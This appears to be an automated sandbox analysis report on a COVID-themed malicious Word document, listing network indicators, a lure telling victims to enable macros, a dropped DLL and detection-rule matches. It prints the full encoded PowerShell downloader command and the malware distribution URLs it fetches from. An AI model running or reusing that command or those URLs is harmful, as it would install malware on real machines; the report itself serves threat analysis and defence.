Source: global trafficHTTP traffic detected: GET /ErrorPages/3/ HTTP/1.1Host: uhk.cncranes.comConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: shulovbaazar.com
Source: unknownHTTP traffic detected: POST /kdd8h70lwp/lfu3p05/u2kanr3/ HTTP/1.1DNT: 0Referer: 69.49.88.46/kdd8h70lwp/lfu3p05/u2kanr3/Content-Type: multipart/form-data; boundary=--------------IOWFryyt5oe5vIUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 69.49.88.46Content-Length: 5572Connection: Keep-AliveCache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2120271741.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111002328.0000000001FF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117576675.00000000022A7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2120271741.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111002328.0000000001FF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117576675.00000000022A7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmpString found in binary or memory: http://mmo.martinpollock.co.uk/a/SQSGg/
Source: powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000002.2107998363.00000000023F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114937163.00000000027A0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2120271741.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111002328.0000000001FF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117576675.00000000022A7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmpString found in binary or memory: http://uhk.cncranes.com
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmpString found in binary or memory: http://uhk.cncranes.com/ErrorPages/3/
Source: rundll32.exe, 00000006.00000002.2120271741.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111002328.0000000001FF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117576675.00000000022A7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2107998363.00000000023F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114937163.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2120077438.0000000002820000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2120271741.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111002328.0000000001FF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117576675.00000000022A7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000002.2115162091.00000000039F1000.00000004.00000001.sdmpString found in binary or memory: http://www.litespeedtech.com
Source: rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2107269724.0000000000394000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2107269724.0000000000394000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmpString found in binary or memory: https://capturetheaction.com.au/wp-includes/Yjp/
Source: powershell.exe, 00000005.00000002.2115174416.0000000003A04000.00000004.00000001.sdmpString found in binary or memory: https://mybusinessevent.com
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmpString found in binary or memory: https://mybusinessevent.com/tiki-install/e/
Source: powershell.exe, 00000005.00000002.2115174416.0000000003A04000.00000004.00000001.sdmpString found in binary or memory: https://mybusinessevent.comp
Source: powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
Source: powershell.exe, 00000005.00000002.2115162091.00000000039F1000.00000004.00000001.sdmpString found in binary or memory: https://shulovbaazar.com
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmpString found in binary or memory: https://shulovbaazar.com/c/bcL6/
Source: powershell.exe, 00000005.00000002.2115174416.0000000003A04000.00000004.00000001.sdmpString found in binary or memory: https://shulovbaazar.comp
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmpString found in binary or memory: https://thenetworker.ca/comment/8N4/
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmpString found in binary or memory: https://trayonlinegh.com/cgi-bin/HBPR/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 12 N@m 13 ;a 10096 G
Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a S
Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a S
Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dllJump to dropped file
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 5517
Source: unknownProcess created: Commandline size = 5421
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5421
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Qafsungwqhhv\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Aanys\cokk.vuqJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10019036
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001307D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10016A8F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100018B2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100082BB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008B58
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000B161
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D96D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B184
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001BFAF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10019FCB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100095D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C201
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001440A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000740C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10009211
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D613
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E813
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000B82E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000CE33
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001A23E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10015449
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001264A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001364E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002055
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001665D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005C61
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005477
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001467C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001E84
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10019496
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000169C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100108A9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100084B3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018CB5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100122BB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001A4BD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014EC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007EC4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D0C9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E6D4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100052D9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C4D9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002CE2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D6E6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100068E6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10012EE8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001BAED
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DAEC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100038F1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10006EF4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10016318
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10019724
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000B32E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004137
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000673B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001AB3D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005F4C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10010550
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003D60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10015B6D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005778
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D385
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018989
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014988
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000ED98
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000319D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CB9F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B9C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100099C3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10009FCC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000FFD4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F9D8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F5DC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100161E6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10010FEF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E1F1
Source: AG60273928I_COVID-19_SARS-CoV-2.docOLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentationOLE, VBA macro: Module Ut2r21ym17z8, Function Document_open
Source: AG60273928I_COVID-19_SARS-CoV-2.docOLE indicator, VBA macros: true
Source: 00000005.00000002.2107242892.0000000000216000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2107409443.0000000001BA6000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.troj.evad.winDOC@16/7@3/5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$60273928I_COVID-19_SARS-CoV-2.docJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD087.tmpJump to behavior
Source: AG60273928I_COVID-19_SARS-CoV-2.docOLE indicator, Word Document stream: true
Source: AG60273928I_COVID-19_SARS-CoV-2.docOLE document summary: title field not present or empty
Source: AG60273928I_COVID-19_SARS-CoV-2.docOLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exeConsole Write: ............Z........................... .C.......C.....................................#...............................h.......5kU.............
Source: C:\Windows\System32\msg.exeConsole Write: ............Z...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......(.......L.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K......(.h.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................F.j....................................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................F.j..... ..............................}..v....H.......0...............(.h.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................dF.j....................................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................dF.j......h.............................}..v............0.................h.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#................G.j....................................}..v....H.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#................G.j..... ..............................}..v............0.................h.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'................L.j.....(..............................}..v.... .......0.................h.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+................L.j.....(..............................}..v.....0......0.................h.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
Source: AG60273928I_COVID-19_SARS-CoV-2.docVirustotal: Detection: 26%
Source: AG60273928I_COVID-19_SARS-CoV-2.docReversingLabs: Detection: 22%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIA
Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 